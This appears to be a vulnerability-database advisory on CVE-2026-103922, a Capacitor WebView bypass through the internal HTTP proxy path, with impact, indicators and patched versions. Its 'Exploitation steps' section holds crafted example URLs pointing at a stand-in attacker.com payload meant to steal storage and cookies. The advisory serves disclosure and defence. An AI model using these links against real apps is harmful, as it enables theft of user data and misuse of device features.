Vulnerability DatabaseCVE-2026-103922

CVE-2026-103922: 
JavaScript vulnerability analysis and mitigation

Overview

CVE-2026-103922 is a WebView navigation bypass vulnerability in Ionic's Capacitor cross-platform native runtime affecting both Android and iOS. The flaw allows an attacker to navigate a WebView frame to the internal HTTP proxy path (/_capacitor_http_interceptor_), causing the native layer to fetch an attacker-controlled URL and return its response as a document at the application's own origin. Affected versions span from 6.0.0 through multiple 8.x releases across @capacitor/android, @capacitor/ios, com.capacitorjs:core, and github.com/ionic-team/capacitor-swift-pm. The vulnerability was published on October 1, 2026, with patches released on October 5, 2026. It carries a CVSS v3.1 base score of 9.3 (Critical) (GitHub Advisory).

Technical details

The root cause is an incomplete navigation guard (CWE-346: Origin Validation Error) that validates only the host and scheme of a target URL but not its path, combined with a confused deputy issue (CWE-441) where the native HTTP proxy acts as an unintended intermediary. Because the internal proxy path (/_capacitor_http_interceptor_) shares the application's host and scheme (https://localhost on Android, capacitor://localhost on iOS), the navigation guard treats it as a legitimate in-app navigation. When a frame navigates to this path with an attacker-supplied u= query parameter, the native layer fetches the attacker-specified URL and returns the response body to the WebView at the app's own origin. Scripts in that response then execute with full same-origin trust, gaining access to localStorage, cookies, and all registered Capacitor plugin capabilities. Critically, the proxy handler was served regardless of whether the CapacitorHttp plugin was enabled, meaning applications that never opted into CapacitorHttp were equally vulnerable (GitHub Advisory, Patch Commit).

Impact

Successful exploitation allows an unauthenticated remote attacker to execute arbitrary scripts at the application's origin with full same-origin trust, resulting in high confidentiality and integrity impact (CVSS availability impact: None). An attacker can exfiltrate localStorage contents, session cookies, and any data accessible to the application's origin, and can invoke any native device capability exposed through registered Capacitor plugins (e.g., camera, file system, contacts, push notifications). The attack surface includes any Capacitor application that renders user-controlled or unsanitized links — such as chat messages, comments, or rich-text content — on both Android and iOS platforms (GitHub Advisory).

Exploitability

Exploitation requires user interaction: a victim must activate (click) a malicious link within the application's WebView, making it a social engineering-dependent attack. No confirmed working exploit code exists; a GitHub repository (techupdate24/capacitor-flaw-cve-2026-103922) was flagged as a fake claim containing only a README and banner image with no actual exploit code (Feedly). There is no evidence of in-the-wild exploitation, no threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.213%, reflecting low near-term exploitation probability (GitHub Advisory).

Exploitation steps

  1. Identify target application: Locate a Capacitor-based mobile application (Android or iOS) running an affected version (6.0.0–6.2.1, 7.0.0–7.6.8, 8.0.0–8.3.4, 8.3.5–8.4.2, or 8.5.0) that renders user-controlled links (e.g., a chat or comment feature).
  2. Craft malicious URL: Construct a URL targeting the internal proxy path with an attacker-controlled payload URL as the u parameter, e.g., https://localhost/_capacitor_http_interceptor_?u=https://attacker.com/payload.html (Android) or capacitor://localhost/_capacitor_http_interceptor_?u=https://attacker.com/payload.html (iOS).
  3. Host malicious payload: Serve a crafted HTML/JavaScript page at the attacker-controlled URL (https://attacker.com/payload.html) containing scripts designed to exfiltrate localStorage, cookies, or invoke Capacitor plugin APIs.
  4. Deliver the link: Inject the crafted URL into a user-visible surface within the application (e.g., send it as a chat message, embed it in a comment, or share it via a deep link).
  5. Victim activates link: When the victim clicks the link inside the WebView, the navigation guard passes it (host and scheme match the app origin), and the native proxy fetches the attacker's payload URL.
  6. Script executes at app origin: The attacker's response is rendered as a document at the application's own origin; scripts in the response run with full same-origin trust, accessing localStorage, cookies, and registered Capacitor plugin capabilities, enabling data exfiltration or native API abuse (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from the mobile device to unexpected external domains originating from the Capacitor app process, particularly requests that appear to be proxied (the native layer fetching attacker-controlled URLs on behalf of the WebView).
  • Logs: Application-level logs showing Handling CapacitorHttp request entries for URLs not matching the application's own assets or expected API endpoints; WebView navigation events targeting paths starting with /_capacitor_http_interceptor_.
  • Behavioral: Unexpected access to device storage, contacts, camera, or other native capabilities by the application without corresponding user-initiated actions; anomalous data exfiltration patterns from the app's localStorage or cookie store.

Mitigation and workarounds

Upgrade Capacitor to one of the patched versions corresponding to your major release branch: 6.2.2, 7.6.9, 8.3.5, 8.4.3, or 8.5.1. After upgrading, rebuild and redistribute the application. If an immediate upgrade is not possible, note that disabling CapacitorHttp is not a sufficient workaround on affected versions, as the proxy path is served regardless of that setting. As a temporary mitigation, implement a custom plugin override: on Android, override shouldOverrideLoad(Uri url) and return true when url.getPath() starts with /_capacitor_http_interceptor_; on iOS, implement shouldOverrideLoad(_:) and return true for the same path. Additionally, sanitize all user-controlled link targets before rendering them in the WebView to reduce the attack surface (GitHub Advisory, Patch Commit).

Community reactions

The vulnerability received notable coverage from security news outlets including CyberSecurityNews, GBHackers, SecurityOnline, and Cryptika, with headlines emphasizing that malicious links could hijack app data and native features (CyberSecurityNews, GBHackers). The Hacker News weekly recap also referenced the vulnerability. Social media discussion appeared on Mastodon and Bluesky, with the infosec community noting the broad impact given Capacitor's widespread use in cross-platform mobile development. The vulnerability was credited to researcher andredestro in the official GitHub advisory (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related JavaScript vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-w2vw-w76x-qr89HIGH8.5
  • JavaScript logoJavaScript
  • nx
NoYesOct 05, 2026
CVE-2026-104852HIGH8.2
  • JavaScript logoJavaScript
  • @graphql-tools/utils
NoYesOct 05, 2026
GHSA-g7fw-3gjp-g5hfMEDIUM6.5
  • JavaScript logoJavaScript
  • @openclaw/matrix
NoYesOct 05, 2026
GHSA-r4xh-jqrq-34v2MEDIUM5.3
  • JavaScript logoJavaScript
  • smol-toml
NoYesOct 05, 2026
GHSA-6688-9rhm-gjv2LOWN/A
  • JavaScript logoJavaScript
  • dompurify
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management